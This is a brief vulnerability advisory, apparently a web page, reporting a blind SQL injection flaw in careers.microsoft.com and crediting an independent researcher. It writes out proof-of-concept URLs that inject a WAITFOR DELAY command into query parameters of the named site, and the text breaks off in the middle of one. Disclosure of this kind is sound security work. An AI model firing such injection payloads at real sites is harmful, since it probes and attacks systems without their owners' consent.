.png)
DescriptionSow Ching Shiong, an independent vulnerability researcher has discovered a Blind SQL Injection vulnerability in careers.microsoft.com, which can be exploited by an attacker to conduct Blind SQL injection attacks.Proof of concept URLs which will cause a time delay of 25 seconds are provided below:http://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=all&dv=1));WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=enhttp://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=1));WAITFOR...